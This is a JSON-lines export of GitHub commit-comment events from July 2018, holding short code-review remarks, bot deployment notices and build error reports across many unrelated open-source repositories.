{"id":"8005110445","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29802887,"position":null,"line":null,"path":null,"commit_id":"d1cd17ee1d094334dccdff484b830a5a604bbe37","created_at":"2018-07-23T16:44:27Z","updated_at":"2018-07-23T16:44:27Z","author_association":"NONE","body":"Yes, and this was the right thing to do.\r\nELO gaining patches should comes first.\r\n\r\nNow let's assume that \r\n`constexpr Score Overload           = S( 13,  6);` is commited\r\n\r\nYou can try a test against this \"new\" S(13, 6) \r\nwith your \"old\" S( 16,  7) and remove the nonPawnEnemies restriction.\r\nThis would also qualify as [-3, 1]"}},"created_at":"2018-07-23T16:44:27Z"}
{"id":"8005111468","type":"CommitCommentEvent","actor":{"login":"felix-development"},"repo":{"name":"Meticulus/android_device_huawei_hi6250"},"payload":{"comment":{"id":29802892,"position":null,"line":null,"path":null,"commit_id":"b2b2a08e89882315343cfa168e1cf50bd2f3f2c8","created_at":"2018-07-23T16:44:41Z","updated_at":"2018-07-23T16:44:41Z","author_association":"NONE","body":"@4PERTURE Since we are talking about 2 different SoC's here porting gonna be diffcult. "}},"created_at":"2018-07-23T16:44:41Z"}
{"id":"8005111492","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29802893,"position":40,"line":40,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentUtility.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-23T16:44:41Z","updated_at":"2018-07-23T16:44:41Z","author_association":"NONE","body":"Done"}},"created_at":"2018-07-23T16:44:41Z"}
{"id":"8005115031","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29802909,"position":65,"line":65,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentUtility.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-23T16:45:20Z","updated_at":"2018-07-23T16:45:20Z","author_association":"NONE","body":"Done"}},"created_at":"2018-07-23T16:45:20Z"}
{"id":"8005116376","type":"CommitCommentEvent","actor":{"login":"jglick"},"repo":{"name":"jenkins-infra/update-center2"},"payload":{"comment":{"id":29802912,"position":null,"line":null,"path":null,"commit_id":"a2561bce11c624af88336f6abd3a2d80eec5dc03","created_at":"2018-07-23T16:45:36Z","updated_at":"2018-07-23T16:45:36Z","author_association":"CONTRIBUTOR","body":"Sounds OK to me, assuming it works."}},"created_at":"2018-07-23T16:45:36Z"}
{"id":"8005121667","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29802924,"position":null,"line":null,"path":null,"commit_id":"94a33d15c6c79b6e75ea7ffd9c94a83988476dd2","created_at":"2018-07-23T16:46:37Z","updated_at":"2018-07-23T16:46:37Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [popoverpar](https://popoverpar-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/support](https://popoverpar-static-docs.pantheonsite.io/docs/support)\n"}},"created_at":"2018-07-23T16:46:37Z"}
{"id":"8005123699","type":"CommitCommentEvent","actor":{"login":"lat9"},"repo":{"name":"zencart/zencart"},"payload":{"comment":{"id":29802931,"position":null,"line":null,"path":null,"commit_id":"b970f7ad34a429bfc0e399a5cfb00a8833323603","created_at":"2018-07-23T16:47:00Z","updated_at":"2018-07-23T16:47:00Z","author_association":"CONTRIBUTOR","body":"I'll get that PR going ... with (yet another) question:\r\n\r\nAt the end of /includes/modules/pages/featured_products/header_php.php, there's this notification:\r\n\r\n```\r\n$zco_notifier->notify('NOTIFY_HEADER_END_FEATURED_PRODUCTS', $keywords);\r\n```\r\n... but the `$keywords` variable is not defined within that script.  Should it be included in the notification since it will generate a PHP Notice (at least) regarding a possibly undefined variable."}},"created_at":"2018-07-23T16:47:00Z"}
{"id":"8005129036","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29802972,"position":null,"line":null,"path":null,"commit_id":"ecdeb500eb62ea1093590cdb2f4d69d10c366c39","created_at":"2018-07-23T16:48:01Z","updated_at":"2018-07-23T16:48:01Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-23T16:48:01Z"}
{"id":"8005134389","type":"CommitCommentEvent","actor":{"login":"calepestes"},"repo":{"name":"AustinGreen/gatsby-starter-netlify-cms"},"payload":{"comment":{"id":29803000,"position":47,"line":39,"path":"package.json","commit_id":"7d06e0222a18ddc2c056a37a7db792ad1ea49441","created_at":"2018-07-23T16:49:01Z","updated_at":"2018-07-23T16:49:01Z","author_association":"NONE","body":"Might want to update the serve script to not run clean as it deletes the build files.  😉 "}},"created_at":"2018-07-23T16:49:01Z"}
{"id":"8005136573","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29803010,"position":82,"line":82,"path":"src/main/java/com/github/cranite/MoreEnchantables/ItemUtility.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-23T16:49:26Z","updated_at":"2018-07-23T16:49:26Z","author_association":"NONE","body":"Done"}},"created_at":"2018-07-23T16:49:26Z"}
{"id":"8005137314","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29803011,"position":43,"line":43,"path":"src/main/java/TaskFour/TaskFour.java","commit_id":"b5d335007ed96305474fc5ed529b173d308c557f","created_at":"2018-07-23T16:49:35Z","updated_at":"2018-07-23T16:49:35Z","author_association":"NONE","body":"А здесь почему имя устройства не из переменной берется?"}},"created_at":"2018-07-23T16:49:35Z"}
{"id":"8005141173","type":"CommitCommentEvent","actor":{"login":"eriwen"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29803022,"position":511,"line":375,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-23T16:50:16Z","updated_at":"2018-07-23T16:50:16Z","author_association":"MEMBER","body":"Fixed"}},"created_at":"2018-07-23T16:50:16Z"}
{"id":"8005141973","type":"CommitCommentEvent","actor":{"login":"eriwen"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29803024,"position":738,"line":533,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-23T16:50:23Z","updated_at":"2018-07-23T16:50:23Z","author_association":"MEMBER","body":"Fixed"}},"created_at":"2018-07-23T16:50:23Z"}
{"id":"8005142113","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29803025,"position":11,"line":11,"path":"src/main/java/TaskFour/TaskFour.java","commit_id":"b5d335007ed96305474fc5ed529b173d308c557f","created_at":"2018-07-23T16:50:25Z","updated_at":"2018-07-23T16:50:25Z","author_association":"NONE","body":"Здесь тоже имя устройства не мешало бы вынести в переменную"}},"created_at":"2018-07-23T16:50:25Z"}
{"id":"8005143209","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29803028,"position":null,"line":null,"path":null,"commit_id":"c6d0b3acfbbd5dd09a1f45ec1b1a0c709b30ae73","created_at":"2018-07-23T16:50:37Z","updated_at":"2018-07-23T16:50:37Z","author_association":"COLLABORATOR","body":"<h3>[docs-theme] add Example forceUpdate prop to disable that behavior (#2699)</h3>\n\nPreview: <strong><a href='https://18771-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18771-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18771-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-23T16:50:37Z"}
{"id":"8005143531","type":"CommitCommentEvent","actor":{"login":"RudiSzubert"},"repo":{"name":"sarawieckowska/online-shop"},"payload":{"comment":{"id":29803029,"position":21,"line":14,"path":"src/app/footer/footerComponents/user-agreement/user-agreement.component.html","commit_id":"9ea86ab18d3730d48602cf78429858310e33d67d","created_at":"2018-07-23T16:50:40Z","updated_at":"2018-07-23T16:50:40Z","author_association":"CONTRIBUTOR","body":"użyj ngFor"}},"created_at":"2018-07-23T16:50:40Z"}
{"id":"8005146294","type":"CommitCommentEvent","actor":{"login":"enekitortega"},"repo":{"name":"enekitortega/PS_LG"},"payload":{"comment":{"id":29803036,"position":null,"line":null,"path":null,"commit_id":"64865bd5826fe103204aff243160f50179879e3c","created_at":"2018-07-23T16:51:12Z","updated_at":"2018-07-23T16:51:12Z","author_association":"OWNER","body":"1_PS_LG: fin del ejercicio1"}},"created_at":"2018-07-23T16:51:12Z"}
{"id":"8005146599","type":"CommitCommentEvent","actor":{"login":"pfultz2"},"repo":{"name":"RadeonOpenCompute/hcc"},"payload":{"comment":{"id":29803037,"position":null,"line":null,"path":null,"commit_id":"614b056188fcf78a5db5a6e62dd34a051b140fa0","created_at":"2018-07-23T16:51:15Z","updated_at":"2018-07-23T16:51:15Z","author_association":"MEMBER","body":"The commit to rocdl doesnt exist in the rocdl repo. When running `git submodule update --init`, I get:\r\n\r\n```\r\nfatal: reference is not a tree: fa3339c24028a80c970100f35f3d37300000d14a\r\nUnable to checkout 'fa3339c24028a80c970100f35f3d37300000d14a' in submodule path 'rocdl'\r\n```"}},"created_at":"2018-07-23T16:51:15Z"}
{"id":"8005147580","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29803038,"position":5,"line":5,"path":"src/main/java/TaskFour/TaskFour.java","commit_id":"b5d335007ed96305474fc5ed529b173d308c557f","created_at":"2018-07-23T16:51:27Z","updated_at":"2018-07-23T16:51:27Z","author_association":"NONE","body":"Я уже писал, что упоминать имя класса/объекта в имени метода излишне. И буду писать до тех пор, пока не поправишь :)"}},"created_at":"2018-07-23T16:51:27Z"}
{"id":"8005148500","type":"CommitCommentEvent","actor":{"login":"eriwen"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29803040,"position":1240,"line":940,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-23T16:51:37Z","updated_at":"2018-07-23T16:51:37Z","author_association":"MEMBER","body":"Fixed"}},"created_at":"2018-07-23T16:51:37Z"}
{"id":"8005149266","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29803042,"position":37,"line":37,"path":"src/main/java/com/github/cranite/MoreEnchantables/MoreEnchantablesPlugin.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-23T16:51:46Z","updated_at":"2018-07-23T16:51:46Z","author_association":"NONE","body":"Done"}},"created_at":"2018-07-23T16:51:46Z"}
{"id":"8005153886","type":"CommitCommentEvent","actor":{"login":"TomasVotruba"},"repo":{"name":"Automattic/phpcs-neutron-standard"},"payload":{"comment":{"id":29803050,"position":11,"line":23,"path":"composer.json","commit_id":"40642df5ec9ea39871f1b99ada7fa34976169788","created_at":"2018-07-23T16:52:39Z","updated_at":"2018-07-23T16:52:39Z","author_association":"CONTRIBUTOR","body":"Thank you :+1: , I've already send a PR :)\r\n\r\n---\r\n\r\n> Our code base is already using phpcs and adding php-cs-fixer would be a much bigger change than adding new sniffs for the existing engine.\r\n\r\nWell, they're different tools, but there is a way :) instead of writing duplicated rules, you could write new ones making your rock even more!\r\n\r\nCould you link some repository using that? I'd like to take a look if that's possible for your case."}},"created_at":"2018-07-23T16:52:39Z"}
{"id":"8005153952","type":"CommitCommentEvent","actor":{"login":"eriwen"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29803051,"position":239,"line":181,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-23T16:52:40Z","updated_at":"2018-07-23T16:52:40Z","author_association":"MEMBER","body":"I weakly prefer to keep the `#` as it tells authors that the section is within the current document. If you feel strongly, I can replace all of the `<<#` with `<<`"}},"created_at":"2018-07-23T16:52:40Z"}
{"id":"8005157151","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29803053,"position":40,"line":40,"path":"src/main/java/TaskFour/TaskFour.java","commit_id":"b5d335007ed96305474fc5ed529b173d308c557f","created_at":"2018-07-23T16:53:19Z","updated_at":"2018-07-23T16:53:19Z","author_association":"NONE","body":"Видимо, тебя смутило, что здесь используется аббревиатура. Не надо смущаться - смело пиши аббревиатуры строчными буквами, что следовать camelNotation)"}},"created_at":"2018-07-23T16:53:19Z"}
{"id":"8005158542","type":"CommitCommentEvent","actor":{"login":"SieLieDie"},"repo":{"name":"SieLieDie/HomeWork"},"payload":{"comment":{"id":29803055,"position":5,"line":25,"path":".gitignore","commit_id":"d1997eea14a55c5a40e5b2ddd3f8dd31f48cc84b","created_at":"2018-07-23T16:53:35Z","updated_at":"2018-07-23T16:53:35Z","author_association":"OWNER","body":"Удаление папки "}},"created_at":"2018-07-23T16:53:35Z"}
{"id":"8005159551","type":"CommitCommentEvent","actor":{"login":"AgustiinNoah"},"repo":{"name":"AgustiinNoah/ProyectoDBZ"},"payload":{"comment":{"id":29803060,"position":null,"line":null,"path":null,"commit_id":"22e20a397dd5d70eefcc35b4b49e388aef795173","created_at":"2018-07-23T16:53:46Z","updated_at":"2018-07-23T16:53:46Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-23T16:53:46Z"}
{"id":"8005159939","type":"CommitCommentEvent","actor":{"login":"AgustiinNoah"},"repo":{"name":"AgustiinNoah/ProyectoDBZ"},"payload":{"comment":{"id":29803061,"position":null,"line":null,"path":null,"commit_id":"22e20a397dd5d70eefcc35b4b49e388aef795173","created_at":"2018-07-23T16:53:51Z","updated_at":"2018-07-23T16:53:51Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-23T16:53:51Z"}
{"id":"8005160414","type":"CommitCommentEvent","actor":{"login":"SieLieDie"},"repo":{"name":"SieLieDie/HomeWork"},"payload":{"comment":{"id":29803062,"position":null,"line":null,"path":null,"commit_id":"d1997eea14a55c5a40e5b2ddd3f8dd31f48cc84b","created_at":"2018-07-23T16:53:56Z","updated_at":"2018-07-23T16:53:56Z","author_association":"OWNER","body":"Удаление папки"}},"created_at":"2018-07-23T16:53:56Z"}
{"id":"8005160421","type":"CommitCommentEvent","actor":{"login":"RudiSzubert"},"repo":{"name":"sarawieckowska/online-shop"},"payload":{"comment":{"id":29803063,"position":10,"line":32,"path":"src/app/header/header.component.scss","commit_id":"8e09eae17b83c00d00e32f62b31538ea42184443","created_at":"2018-07-23T16:53:56Z","updated_at":"2018-07-23T16:53:56Z","author_association":"CONTRIBUTOR","body":"spróbuj osiągnąć to samo bez ujemnych marginów (w wielu miejsach je widziałem)"}},"created_at":"2018-07-23T16:53:56Z"}
{"id":"8005161840","type":"CommitCommentEvent","actor":{"login":"diparthshah"},"repo":{"name":"diparthshah/Galapagos"},"payload":{"comment":{"id":29803067,"position":31,"line":77,"path":"app/assets/javascripts/beak/widgets/ractives/code-editor.coffee","commit_id":"0c78fde0c4c87b251838faa4184e76f6d579f910","created_at":"2018-07-23T16:54:12Z","updated_at":"2018-07-23T16:54:12Z","author_association":"OWNER","body":"do you mean not checking the `if editor.somethingSelected()` in `getCodeUsage()` ?"}},"created_at":"2018-07-23T16:54:12Z"}
{"id":"8005170001","type":"CommitCommentEvent","actor":{"login":"juhlee-microsoft"},"repo":{"name":"LIS/LISAv2"},"payload":{"comment":{"id":29803079,"position":5,"line":17,"path":"Testscripts/Windows/RHUI-BVT-VERIFY-RPM-SOURCE.ps1","commit_id":"082f21c5c80c355083121f8a933106216b26d997","created_at":"2018-07-23T16:55:42Z","updated_at":"2018-07-23T16:55:42Z","author_association":"COLLABORATOR","body":"There might be confusion from early comment. Below is what I look for \r\n\r\n**$DistroName.ToUpper() -eq \"REDHAT\"**"}},"created_at":"2018-07-23T16:55:42Z"}
{"id":"8005172919","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29803082,"position":46,"line":46,"path":"src/main/java/TaskFour/TaskFour.java","commit_id":"b5d335007ed96305474fc5ed529b173d308c557f","created_at":"2018-07-23T16:56:14Z","updated_at":"2018-07-23T16:56:14Z","author_association":"NONE","body":"Вот здесь нотация верная. Но в целом имена переменных/полей должны достаточно точно отражать их семантику: если значение, хранящееся в переменной - это компьютер в целом, то переменную можно назвать ```computer```. Но если в переменной храниться _имя_ компьютера, то и называть её правильней ```computerName```"}},"created_at":"2018-07-23T16:56:14Z"}
{"id":"8005173235","type":"CommitCommentEvent","actor":{"login":"RacheltheEditor"},"repo":{"name":"jlevy/og-equity-compensation"},"payload":{"comment":{"id":29803083,"position":null,"line":null,"path":null,"commit_id":"37a4ed91f8ae893eaae5af7f6e10917407e36aaf","created_at":"2018-07-23T16:56:18Z","updated_at":"2018-07-23T16:56:18Z","author_association":"COLLABORATOR","body":"👍 Great! "}},"created_at":"2018-07-23T16:56:18Z"}
{"id":"8005178296","type":"CommitCommentEvent","actor":{"login":"cmkumar87"},"repo":{"name":"WING-NUS/nus-mooc-corpus"},"payload":{"comment":{"id":29803090,"position":14,"line":14,"path":"scripts/analysis/lenient_kappa.py","commit_id":"29fa074fe0318059a94c492183198d09a8073746","created_at":"2018-07-23T16:57:18Z","updated_at":"2018-07-23T16:57:18Z","author_association":"MEMBER","body":"add a more specific link"}},"created_at":"2018-07-23T16:57:18Z"}
{"id":"8005179748","type":"CommitCommentEvent","actor":{"login":"cmkumar87"},"repo":{"name":"WING-NUS/nus-mooc-corpus"},"payload":{"comment":{"id":29803095,"position":37,"line":37,"path":"scripts/analysis/lenient_kappa.py","commit_id":"29fa074fe0318059a94c492183198d09a8073746","created_at":"2018-07-23T16:57:35Z","updated_at":"2018-07-23T16:57:35Z","author_association":"MEMBER","body":"this doesnt go anywhere"}},"created_at":"2018-07-23T16:57:35Z"}
{"id":"8005184609","type":"CommitCommentEvent","actor":{"login":"eriwen"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29803103,"position":221,"line":169,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-23T16:58:32Z","updated_at":"2018-07-23T16:58:32Z","author_association":"MEMBER","body":"Hmm, with the current dotted border styling this is tough to make look good here and elsewhere. I think the only rough-looking bit is the comma after the \"p\" in \"Zip\". I'm not sure it's worth a lot of effort here, do you agree?"}},"created_at":"2018-07-23T16:58:32Z"}
{"id":"8005185118","type":"CommitCommentEvent","actor":{"login":"n-peugnet"},"repo":{"name":"n-peugnet/ffff"},"payload":{"comment":{"id":29803106,"position":null,"line":null,"path":null,"commit_id":"c61d40da4ea4309589a0fae6d3dec52b638648e1","created_at":"2018-07-23T16:58:37Z","updated_at":"2018-07-23T16:58:37Z","author_association":"OWNER","body":"fixes #9 "}},"created_at":"2018-07-23T16:58:37Z"}
{"id":"8005186685","type":"CommitCommentEvent","actor":{"login":"n-peugnet"},"repo":{"name":"n-peugnet/ffff"},"payload":{"comment":{"id":29803109,"position":null,"line":null,"path":null,"commit_id":"4dd5ae7ff67a08c7ce62e261baba89bfea2eb19c","created_at":"2018-07-23T16:58:54Z","updated_at":"2018-07-23T16:58:54Z","author_association":"OWNER","body":"fixes #9 "}},"created_at":"2018-07-23T16:58:54Z"}
{"id":"8005186836","type":"CommitCommentEvent","actor":{"login":"DubrulleKevin"},"repo":{"name":"FredBezies/arch-tuto-installation"},"payload":{"comment":{"id":29803110,"position":null,"line":null,"path":null,"commit_id":"683742ae670874b43ee366ee503fff56b095c7ab","created_at":"2018-07-23T16:58:56Z","updated_at":"2018-07-23T16:58:56Z","author_association":"CONTRIBUTOR","body":"Fred,\r\n\r\nD'accord, pas de soucis !"}},"created_at":"2018-07-23T16:58:56Z"}
{"id":"8005186893","type":"CommitCommentEvent","actor":{"login":"HOD42"},"repo":{"name":"HOD42/BlinktMonitor"},"payload":{"comment":{"id":29803111,"position":3,"line":3,"path":"config.txt","commit_id":"826c1c4ce37069f9e7749ace9e4a0c3258f1df90","created_at":"2018-07-23T16:58:57Z","updated_at":"2018-07-23T16:58:57Z","author_association":"OWNER","body":"This key has now been deleted."}},"created_at":"2018-07-23T16:58:57Z"}
{"id":"8005188417","type":"CommitCommentEvent","actor":{"login":"cmkumar87"},"repo":{"name":"WING-NUS/nus-mooc-corpus"},"payload":{"comment":{"id":29803115,"position":53,"line":53,"path":"scripts/analysis/lenient_kappa.py","commit_id":"29fa074fe0318059a94c492183198d09a8073746","created_at":"2018-07-23T16:59:14Z","updated_at":"2018-07-23T16:59:14Z","author_association":"MEMBER","body":"I have no idea about how this works. No comments. variable names dont mean much. If we are proposing a 'kappa' measure that someone wants to replicate they cant do so."}},"created_at":"2018-07-23T16:59:14Z"}
{"id":"8005188443","type":"CommitCommentEvent","actor":{"login":"daniel-wer"},"repo":{"name":"scalableminds/webknossos"},"payload":{"comment":{"id":29803116,"position":38,"line":162,"path":"app/assets/javascripts/oxalis/view/nml_upload_zone_container.js","commit_id":"a1b906f6273b5239c990e176d923f06aae0f00aa","created_at":"2018-07-23T16:59:14Z","updated_at":"2018-07-23T16:59:14Z","author_association":"CONTRIBUTOR","body":"Shouldn't this only be actions? I think you forgot to change the name after introducing the helper method."}},"created_at":"2018-07-23T16:59:14Z"}
{"id":"8005188913","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29803117,"position":5,"line":1753,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"6d44d2d49f7c7685281c6d2a5a804b6008005fdf","created_at":"2018-07-23T16:59:17Z","updated_at":"2018-07-23T16:59:17Z","author_association":"COLLABORATOR","body":"Yeah it is, that appears to be the case. I initially thought it was \"resul\" but in the texts it is used as aziz. "}},"created_at":"2018-07-23T16:59:17Z"}
{"id":"8005190118","type":"CommitCommentEvent","actor":{"login":"cmkumar87"},"repo":{"name":"WING-NUS/nus-mooc-corpus"},"payload":{"comment":{"id":29803119,"position":64,"line":64,"path":"scripts/analysis/lenient_kappa.py","commit_id":"29fa074fe0318059a94c492183198d09a8073746","created_at":"2018-07-23T16:59:31Z","updated_at":"2018-07-23T16:59:31Z","author_association":"MEMBER","body":"remove unused code marked with # comments"}},"created_at":"2018-07-23T16:59:31Z"}
{"id":"8005191382","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29803120,"position":null,"line":null,"path":null,"commit_id":"ccfcb431d0089f84ef37603c0bd76f78be69c9dd","created_at":"2018-07-23T16:59:46Z","updated_at":"2018-07-23T16:59:46Z","author_association":"MEMBER","body":"Arcade build is not officially supported.  You may need to make adjustments to lua scripts if it's broken."}},"created_at":"2018-07-23T16:59:46Z"}
{"id":"8005191403","type":"CommitCommentEvent","actor":{"login":"jd-lara"},"repo":{"name":"NREL/PowerSystems.jl"},"payload":{"comment":{"id":29803121,"position":null,"line":null,"path":null,"commit_id":"2d77cd83e3a7844ccc9f1bd21b625d0bd62536fb","created_at":"2018-07-23T16:59:46Z","updated_at":"2018-07-23T16:59:46Z","author_association":"CONTRIBUTOR","body":"closes #10 "}},"created_at":"2018-07-23T16:59:46Z"}
{"id":"8005193897","type":"CommitCommentEvent","actor":{"login":"desinas"},"repo":{"name":"desinas/myreads-bookshelf"},"payload":{"comment":{"id":29803126,"position":null,"line":null,"path":null,"commit_id":"d7e218da1cb1eddb4980b10342acf620e56a8bc3","created_at":"2018-07-23T17:00:14Z","updated_at":"2018-07-23T17:00:14Z","author_association":"OWNER","body":"The starter template for the final assessment project for Udacity's React Fundamentals course. The goal of this template is to save you time by providing a static example of the CSS and HTML markup that may be used. The code used to start is from the master branch on the repo: \r\nhttps://github.com/udacity/reactnd-project-myreads-starter/"}},"created_at":"2018-07-23T17:00:14Z"}
{"id":"8005194628","type":"CommitCommentEvent","actor":{"login":"MaximeDup"},"repo":{"name":"RumbleballTheReal/RuntimeMeshComponent"},"payload":{"comment":{"id":29803127,"position":null,"line":null,"path":null,"commit_id":"052a309bbdf2d08a075a314bdfbeca00a9c1d082","created_at":"2018-07-23T17:00:21Z","updated_at":"2018-07-23T17:00:21Z","author_association":"NONE","body":"Can't find any \"GetStreamAccessPointer\" here. UE 4.20.1"}},"created_at":"2018-07-23T17:00:21Z"}
{"id":"8005195806","type":"CommitCommentEvent","actor":{"login":"cmkumar87"},"repo":{"name":"WING-NUS/nus-mooc-corpus"},"payload":{"comment":{"id":29803131,"position":null,"line":null,"path":null,"commit_id":"29fa074fe0318059a94c492183198d09a8073746","created_at":"2018-07-23T17:00:34Z","updated_at":"2018-07-23T17:00:34Z","author_association":"MEMBER","body":"Please make the script readable and executable out-of-the-box. we will have link this in the paper."}},"created_at":"2018-07-23T17:00:34Z"}
{"id":"8005196630","type":"CommitCommentEvent","actor":{"login":"4PERTURE"},"repo":{"name":"Meticulus/android_device_huawei_hi6250"},"payload":{"comment":{"id":29803134,"position":null,"line":null,"path":null,"commit_id":"b2b2a08e89882315343cfa168e1cf50bd2f3f2c8","created_at":"2018-07-23T17:00:43Z","updated_at":"2018-07-23T17:00:43Z","author_association":"NONE","body":"@Meticulus I know I know I just thought it would be possible because if I'm not mistaken some of our nougat blobs were taken from the p9"}},"created_at":"2018-07-23T17:00:43Z"}
{"id":"8005197914","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29803137,"position":null,"line":null,"path":null,"commit_id":"3182ba9f187a81d1a6658220a1dacf61d18aab94","created_at":"2018-07-23T17:00:58Z","updated_at":"2018-07-23T17:00:58Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-509](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-509).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-509-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-23T17:00:58Z"}
{"id":"8005200666","type":"CommitCommentEvent","actor":{"login":"diparthshah"},"repo":{"name":"diparthshah/Galapagos"},"payload":{"comment":{"id":29803144,"position":72,"line":118,"path":"app/assets/javascripts/beak/widgets/ractives/code-editor.coffee","commit_id":"0c78fde0c4c87b251838faa4184e76f6d579f910","created_at":"2018-07-23T17:01:29Z","updated_at":"2018-07-23T17:01:29Z","author_association":"OWNER","body":"i am now invoking `getSelectedUsageItem()` as:\r\n`<li class=\"netlogo-codeusage-item\" on-click=\"getSelectedUsageItem()\">{{code}}</li>`\r\nAny particular reason about why should we use Ractive events ?\r\nfunction only get invoked when list item is clicked and `event.target.innerHTML` tells us which is clicked."}},"created_at":"2018-07-23T17:01:29Z"}
{"id":"8005200989","type":"CommitCommentEvent","actor":{"login":"Lazersmoke"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29803147,"position":63,"line":63,"path":"src/main/java/com/github/cranite/MoreEnchantables/Configuration.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-23T17:01:33Z","updated_at":"2018-07-23T17:01:33Z","author_association":"NONE","body":"Wouldn't an uncaught exception just float up to top level and go to spigot's exception handler (which spits an exception in to console log)? Don't catch NPE or IllegalArgument. We want to catch and safely handle IO or SQL errors because that indicates that like SQL is misconfigured or a file is missing or smth that isn't strictly a programming issue. You *don't* want to print stack traces (probably) for these errors, better to give a friendly message like \"you don't have a config file\" or \"SQL is misconfigured\" than to present the user with something that looks (to a non-technical eye) the same as an NPE."}},"created_at":"2018-07-23T17:01:33Z"}
{"id":"8005203732","type":"CommitCommentEvent","actor":{"login":"magic1215"},"repo":{"name":"OpenIV-Team/OpenIV-Languages"},"payload":{"comment":{"id":29803154,"position":null,"line":null,"path":null,"commit_id":"485208b67c549488567b962d44f880fe0054c58e","created_at":"2018-07-23T17:02:04Z","updated_at":"2018-07-23T17:02:04Z","author_association":"NONE","body":"OpenIV/Resources/Languages/es_ES/Tools/RenderUI.Common.xml"}},"created_at":"2018-07-23T17:02:04Z"}
{"id":"8005205325","type":"CommitCommentEvent","actor":{"login":"magic1215"},"repo":{"name":"OpenIV-Team/OpenIV-Languages"},"payload":{"comment":{"id":29803156,"position":null,"line":null,"path":null,"commit_id":"485208b67c549488567b962d44f880fe0054c58e","created_at":"2018-07-23T17:02:22Z","updated_at":"2018-07-23T17:02:22Z","author_association":"NONE","body":"OpenIV/Resources/Languages/es_ES/Tools/RenderUI.Common.xml"}},"created_at":"2018-07-23T17:02:22Z"}
